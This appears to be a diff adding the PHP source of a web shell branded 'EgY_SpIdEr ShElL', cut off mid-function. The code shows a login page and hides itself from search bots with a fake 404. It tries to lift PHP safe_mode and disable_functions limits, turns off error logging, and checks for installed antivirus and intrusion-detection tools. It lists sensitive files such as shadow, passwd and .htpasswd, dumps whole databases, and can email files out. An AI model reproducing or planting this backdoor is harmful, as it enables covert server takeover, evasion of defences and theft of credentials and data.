+BODY
+ {
+        SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
+}
+
+
+tr {
+BORDER-RIGHT:  #dadada ;
+BORDER-TOP:    #dadada ;
+BORDER-LEFT:   #dadada ;
+BORDER-BOTTOM: #dadada ;
+color: #ffffff;
+}
+td {
+BORDER-RIGHT:  #dadada ;
+BORDER-TOP:    #dadada ;
+BORDER-LEFT:   #dadada ;
+BORDER-BOTTOM: #dadada ;
+color: #dadada;
+}
+.table1 {
+BORDER: 1;
+BACKGROUND-COLOR: #000000;
+color: #333333;
+}
+.td1 {
+BORDER: 1;
+font: 7pt tahoma;
+color: #ffffff;
+}
+.tr1 {
+BORDER: 1;
+color: #dadada;
+}
+table {
+BORDER:  #eeeeee  outset;
+BACKGROUND-COLOR: #000000;
+color: #dadada;
+}
+input {
+BORDER-RIGHT:  #00FF00 1 solid;
+BORDER-TOP:    #00FF00 1 solid;
+BORDER-LEFT:  #00FF00 1 solid;
+BORDER-BOTTOM: #00FF00 1 solid;
+BACKGROUND-COLOR: #333333;
+font: 9pt tahoma;
+color: #ffffff;
+}
+select {
+BORDER-RIGHT:  #ffffff 1 solid;
+BORDER-TOP:    #999999 1 solid;
+BORDER-LEFT:   #999999 1 solid;
+BORDER-BOTTOM: #ffffff 1 solid;
+BACKGROUND-COLOR: #000000;
+font: 9pt tahoma;
+color: #dadada;;
+}
+submit {
+BORDER:  buttonhighlight 1 outset;
+BACKGROUND-COLOR: #272727;
+width: 40%;
+color: #dadada;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1 solid;
+BORDER-TOP:    #999999 1 solid;
+BORDER-LEFT:   #999999 1 solid;
+BORDER-BOTTOM: #ffffff 1 solid;
+BACKGROUND-COLOR: #333333;
+font: Fixedsys bold;
+color: #ffffff;
+}
+BODY {
+margin: 1;
+color: #dadada;
+background-color: #000000;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+
+
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>';
+
+
+<body>
+<br><br><div style="font-size: 14pt;" align="center"><?=$tacfg['title']?></div>
+<hr width="300" size="1" noshade color="#cdcdcd">
+<p>
+<div align="center" class="grey">
+<?=$tacfg['helptext']?>
+</div>
+<p>
+<?
+if (isset($_SERVER['REQUEST_URI'])) $action = $_SERVER['REQUEST_URI'];
+else $action = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
+if (strpos($action, 'logout=1', strpos($action, '?')) !== false) $action = str_replace('logout=1', '', $action);
+?>
+<form name="txtauth" action="<?=$action?>" method="post">
+<div align="center">
+<table border="0" cellpadding="4" cellspacing="0" bgcolor="#666666" style="border: 1px double #dedede;" dir="ltr">
+<?=(isset($err))?'<tr><td colspan="2" align="center"><font color="red">'.$err.'</font></td></tr>':''?>
+<?if (isset($tacfg['uname'])) {?>
+<tr><td>User:</td><td><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr>
+<?}?>
+<tr><td>Password:</td><td><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr>
+<?if ($tacfg['allowrm']) {?>
+<tr><td align="left"><input type="submit" name="login" value="Login">
+</td><td align="right"><input type="checkbox" name="rm" id="rm"><label for="rm"> 
+	Remmeber Me?</label></td></tr>
+<?} else {?>
+<tr><td colspan="2" align="center">
+	<input type="submit" name="login" value="Login"></td></tr>
+<?}?>
+</table>
+</div>
+</form>
+
+
+<br><br>
+<hr width="300" size="1" noshade color="#cdcdcd">
+<div class="smalltxt" align="center">Developed by
+	<a href="mailto:egy_spider@hotmail.com">EgY SpIdEr </a>· copyright ©  
+	 & EgY SpIdEr</div>
+
+
+</body>
+</html>
+<?
+  // Don't delete this!
+  exit();
+}
+?>
+Login As (<font color="#FF0000"><? echo $tacfgd['uname']; ?></font>) <a href="?logout=1">Logout</a></p>
+<div align="right">
+<?php
+
+
+if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}
+
+
+$language='eng';
+
+
+$auth = 0;
+
+
+$name='7d1f6442a9ed59e62f93dcbc2695baa6'; 
+$pass='7d1f6442a9ed59e62f93dcbc2695baa6';
+
+
+//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
+@setlocale(LC_ALL,'ru_RU.cp1251');
+
+
+@ini_restore("safe_mode");
+@ini_restore("open_basedir");
+@ini_restore("safe_mode_include_dir");
+@ini_restore("safe_mode_exec_dir");
+@ini_restore("disable_functions");
+@ini_restore("allow_url_fopen");
+
+
+if(@function_exists('ini_set'))
+ {
+ @ini_set('error_log',NULL);
+ @ini_set('log_errors',0);
+ @ini_set('file_uploads',1);
+ @ini_set('allow_url_fopen',1);
+ }
+else
+ {
+ @ini_alter('error_log',NULL);
+ @ini_alter('log_errors',0);
+ @ini_alter('file_uploads',1);
+ @ini_alter('allow_url_fopen',1);
+ }
+ 
+error_reporting(E_ALL);
+
+
+/* ??? ????? */
+$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
+$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');
+$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');
+$downloaders = array('wget','fetch','lynx','links','curl','get');
+
+
+/* ??? ?????? ???????? ???? ????? realpath() */
+//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; 
+//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz"; 
+//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 
+//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz"; 
+//$chars_rlph = "_-.01234567890"; 
+$chars_rlph = "abcdefghijklnmopqrstuvwxyz"; 
+
+
+$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php',
+'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root',
+'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs',
+'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');
+
+
+/******************************************************************************************************/
+
+
+define("starttime",@getmicrotime());
+
+
+if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
+
+
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if(@function_exists('ini_set'))
+ {
+ @ini_set('max_execution_time',0);
+ @ini_set('output_buffering',0);
+ }
+else
+ {
+ @ini_alter('max_execution_time',0);
+ @ini_alter('output_buffering',0);
+ }
+$safe_mode = @ini_get('safe_mode');
+#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};
+$version = '1.42';
+if(@version_compare(@phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_COOKIE as $k=>$v)
+  {
+  $_COOKIE[$k] = stripslashes($v);
+  } 
+ }
+
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="HELLO!"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<h1>Access Denied</h1>");
+   }
+}   
+
+
+if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) {
+	$tempdir='./';
+	$select_tempdir = '<select name=tempdir><option value="./">./</option>';
+	foreach( $tempdirs as $item) {
+		if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;}
+	}
+	$select_tempdir .= '</select>';
+}else{
+	if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];}
+	$select_tempdir = $_COOKIE['select_tempdir'];
+}
+
+
+$head = '<!-- EgY_SpIdEr -->
+<html>
+<head>
+<meta http-equiv="Content-Language" content="ar-sa">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
+<title>EgY_SpIdEr ShElL</title>
+
+
+
+
+
+
+<STYLE>
+
+
+BODY
+ {
+        SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
+}
+
+
+tr {
+BORDER-RIGHT:  #333333 ;
+BORDER-TOP:    #333333 ;
+BORDER-LEFT:   #333333 ;
+BORDER-BOTTOM: #333333 ;
+color: #FFFFFF;
+}
+td {
+BORDER-RIGHT:  #333333 ;
+BORDER-TOP:    #333333 ;
+BORDER-LEFT:   #333333 ;
+BORDER-BOTTOM: #333333 ;
+color: #FFFFFF;
+}
+.table1 {
+BORDER: 1;
+BACKGROUND-COLOR: #000000;
+color: #333333;
+}
+.td1 {
+BORDER: 1;
+font: 7pt tahoma;
+color: #ffffff;
+}
+.tr1 {
+BORDER: 1;
+color: #333333;
+}
+table {
+BORDER:  #eeeeee  outset;
+BACKGROUND-COLOR: #000000;
+color: #333333;
+}
+input {
+BORDER-RIGHT:  #00FF00 1 solid;
+BORDER-TOP:    #00FF00 1 solid;
+BORDER-LEFT:  #00FF00 1 solid;
+BORDER-BOTTOM: #00FF00 1 solid;
+BACKGROUND-COLOR: #333333;
+font: 9pt tahoma;
+color: #ffffff;
+}
+select {
+BORDER-RIGHT:  #ffffff 1 solid;
+BORDER-TOP:    #999999 1 solid;
+BORDER-LEFT:   #999999 1 solid;
+BORDER-BOTTOM: #ffffff 1 solid;
+BACKGROUND-COLOR: #000000;
+font: 9pt tahoma;
+color: #333333;;
+}
+submit {
+BORDER:  buttonhighlight 1 outset;
+BACKGROUND-COLOR: #272727;
+width: 40%;
+color: #333333;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1 solid;
+BORDER-TOP:    #999999 1 solid;
+BORDER-LEFT:   #999999 1 solid;
+BORDER-BOTTOM: #ffffff 1 solid;
+BACKGROUND-COLOR: #333333;
+font: Fixedsys bold;
+color: #ffffff;
+}
+BODY {
+margin: 1;
+color: #333333;
+background-color: #000000;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+
+
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        } 
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    } 
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";            
+        $fr   .= "\x00\x00";            
+        $fr   .= "\x08\x00";            
+        $fr   .= $hexdtime;             
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);             
+        $fr      .= pack('V', $c_len);           
+        $fr      .= pack('V', $unc_len);         
+        $fr      .= pack('v', strlen($name));    
+        $fr      .= pack('v', 0);                
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x14\x00";                
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x08\x00";                
+        $cdrec .= $hexdtime;                 
+        $cdrec .= pack('V', $crc);           
+        $cdrec .= pack('V', $c_len);         
+        $cdrec .= pack('V', $unc_len);       
+        $cdrec .= pack('v', strlen($name) ); 
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('V', 32 );            
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('V', strlen($ctrldir)) .           
+            pack('V', strlen($data)) .              
+            "\x00\x00";              
+    }
+}
+
+
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress')) 
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     } 
+     else if ($compress == 'gzip' && @function_exists('gzencode')) 
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     } 
+     else if ($compress == 'zip' && @function_exists('gzcompress')) 
+     {
+     $filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     } 
+     else 
+     {
+     $mime_type = 'application/octet-stream';
+     }
+ }
+
+
+function moreread($temp){
+global $lang,$language;
+$str='';
+  if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){
+   if($ffile){
+     while(!@feof($ffile)){$str .= @fgets($ffile);};
+     fclose($ffile);
+   }
+  }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){
+   if($ffile){
+     $str = @fread($ffile, @filesize($temp));
+     @fclose($ffile);
+   }
+  }elseif(@function_exists('file')&&($ffiles = @file($temp))){
+   foreach ($ffiles as $ffile) { $str .= $ffile; }
+  }elseif(@function_exists('file_get_contents')){
+   $str = @file_get_contents($temp);
+  }elseif(@function_exists('readfile')){
+   $str = @readfile($temp);
+  }elseif(@function_exists('highlight_file')){
+   $str = @highlight_file($temp);
+  }elseif(@function_exists('show_source')){
+   $str = @show_source($temp);
+  }else{echo $lang[$language.'_text56'];}
+return $str;
+}
+
+
+function readzlib($filename,$temp=''){
+global $lang,$language;
+$str='';
+  if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
+  if(@copy("compress.zlib://".$filename, $temp)) {
+   $str = moreread($temp);
+  } else echo $lang[$language.'_text119'];
+  @unlink($temp);
+return $str;
+}
+
+
+function morewrite($temp,$str='')
+{
+global $lang,$language;
+ if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
+  if($ffile){
+   @fwrite($ffile,$str);
+   @fclose($ffile);
+  }
+ }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
+  if($ffile){
+   @fputs($ffile,$str);
+   @fclose($ffile);
+  }
+ }elseif(@function_exists('file_put_contents')){
+   @file_put_contents($temp,$str);
+ }else return 0;
+return 1;
+}
+
+
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';
+ var $base = '';
+ var $db   = '';
+ var $connection;
+ var $res;        
+ var $error;      
+ var $rows;       
+ var $columns;     
+ var $num_rows;   
+ var $num_fields; 
+ var $dump;       
+ 
+ function connect()
+  {   
+  switch($this->db)
+     {
+   case 'MySQL': 
+    if(empty($this->port)) { $this->port = '3306'; }
+    if(!@function_exists('mysql_connect')) return 0;
+    $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
+    if(is_resource($this->connection)) return 1;
+   break;
+   case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+    if(!@function_exists('mssql_connect')) return 0;
+    $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
+      if($this->connection) return 1;
+   break;
+   case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!@function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+   break;
+   case 'Oracle':
+      if(!@function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+   break;
+   case 'MySQLi':
+    if(empty($this->port)) { $this->port = '3306'; }
+    if(!@function_exists('mysqli_connect')) return 0;
+    $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port);
+    if(is_resource($this->connection)) return 1;
+   break;
+   case 'mSQL':
+    if(!@function_exists('msql_connect')) return 0;
+    $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass);
+    if(is_resource($this->connection)) return 1;
+   break;
+   case 'SQLite':
+    if(!@function_exists('sqlite_open')) return 0;
+    $this->connection = @sqlite_open($this->base);
+    if(is_resource($this->connection)) return 1;
+   break;
+     }
+    return 0;   
+  }
+  
+ function select_db()
+  {
+   switch($this->db)
+    {
+  case 'MySQL':
+   if(@mysql_select_db($this->base,$this->connection)) return 1;
+  break;
+  case 'MSSQL':
+   if(@mssql_select_db($this->base,$this->connection)) return 1;
+  break;
+  case 'PostgreSQL':
+     return 1;
+  break;
+  case 'Oracle':
+     return 1;
+  break;
+  case 'MySQLi':
+     return 1;
+  break;
+  case 'mSQL':
+     if(@msql_select_db($this->base,$this->connection)) return 1;
+  break;
+  case 'SQLite':
+     return 1;
+  break;
+    }
+ return 0;  
+  }
+  
+ function query($query)
+  { 
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+  case 'MySQL': 
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) 
+      { 
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      } 
+     else if(is_resource($this->res)) { return 1; }                   
+     return 2;                                                          
+  break;
+  case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection))) 
+      {
+      $this->error = 'Query error';
+      return 0;
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;     
+  break;
+  case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2; 
+  break;
+  case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';
+      }
+     else 
+      { 
+      if(@ociexecute($this->res)) 
+       {
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;
+       }
+      $error = @ocierror();
+      $this->error=$error['message']; 
+      }
+  break;
+  case 'MySQLi': 
+     if(false===($this->res=@mysqli_query($this->connection,$query))) 
+      { 
+      $this->error = @mysqli_error($this->connection);
+      return 0;
+      } 
+     else if(is_resource($this->res)) { return 1; }                   
+     return 2;                                                          
+  break;
+  case 'mSQL': 
+     if(false===($this->res=@msql_query($query,$this->connection))) 
+      { 
+      $this->error = @msql_error($this->connection);
+      return 0;
+      } 
+     else if(is_resource($this->res)) { return 1; }                   
+     return 2;                                                          
+  break;
+  case 'SQLite': 
+     if(false===($this->res=@sqlite_query($this->connection,$query))) 
+      { 
+      $this->error = @sqlite_error_string($this->connection);
+      return 0;
+      } 
+     else if(is_resource($this->res)) { return 1; }                   
+     return 2;                                                          
+  break;
+    }
+  return 0;
+  }
+ function get_result()
+  { 
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;
+   switch($this->db)
+    {
+  case 'MySQL':
+   $this->num_rows=@mysql_num_rows($this->res);
+   $this->num_fields=@mysql_num_fields($this->res);
+   while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); 
+   @mysql_free_result($this->res);
+   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+  break;
+  case 'MSSQL':
+   $this->num_rows=@mssql_num_rows($this->res);
+   $this->num_fields=@mssql_num_fields($this->res);    
+   while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+   @mssql_free_result($this->res);
+   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+  break;
+  case 'PostgreSQL':
+   $this->num_rows=@pg_num_rows($this->res); 
+   $this->num_fields=@pg_num_fields($this->res);   
+   while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+   @pg_free_result($this->res);
+   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+  break;
+  case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+  break;
+  case 'MySQLi':
+     $this->num_rows=@mysqli_num_rows($this->res);
+     $this->num_fields=@mysqli_num_fields($this->res);
+     while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res))); 
+     @mysqli_free_result($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+  break;
+  case 'mSQL':
+     $this->num_rows=@msql_num_rows($this->res);
+     $this->num_fields=@msql_num_fields($this->res);
+     while(false !== ($this->rows[] = @msql_fetch_array($this->res))); 
+     @msql_free_result($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+  break;
+  case 'SQLite':
+     $this->num_rows=@sqlite_num_rows($this->res);
+     $this->num_fields=@sqlite_num_fields($this->res);
+     while(false !== ($this->rows[] = @sqlite_fetch_array($this->res))); 
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+  break;
+    }
+   return 0; 
+  }
+ function dump($table)
+  { 
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+  case 'MySQL':
+     $this->dump[0] = '## MySQL dump';
+     if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+     if(!$this->get_result()) return 0;
+     $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+     if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+   if(!$this->get_result()) return 0;
+   for($i=0;$i<$this->num_rows;$i++)
+    {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
+    $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+    }
+  break;
+  case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+   if(!$this->get_result()) return 0;
+   for($i=0;$i<$this->num_rows;$i++)
+    {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+    }
+  break;
+  case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+   if(!$this->get_result()) return 0;
+   for($i=0;$i<$this->num_rows;$i++)
+    {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} 
+    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+    } 
+  break;
+  case 'Oracle':
+     $this->dump[0] = '## ORACLE dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+   if(!$this->get_result()) return 0;
+   for($i=0;$i<$this->num_rows;$i++)
+    {     
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+    }
+  break;
+  case 'MySQLi':
+     $this->dump[0] = '## MySQLi dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+   if(!$this->get_result()) return 0;
+   for($i=0;$i<$this->num_rows;$i++)
+    {     
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);}
+    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+    }
+  break;
+  case 'mSQL':
+     $this->dump[0] = '## mSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+   if(!$this->get_result()) return 0;
+   for($i=0;$i<$this->num_rows;$i++)
+    {     
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+    }
+  break;
+  case 'SQLite':
+     $this->dump[0] = '## SQLite dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+   if(!$this->get_result()) return 0;
+   for($i=0;$i<$this->num_rows;$i++)
+    {     
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+    }
+  break;
+  default:
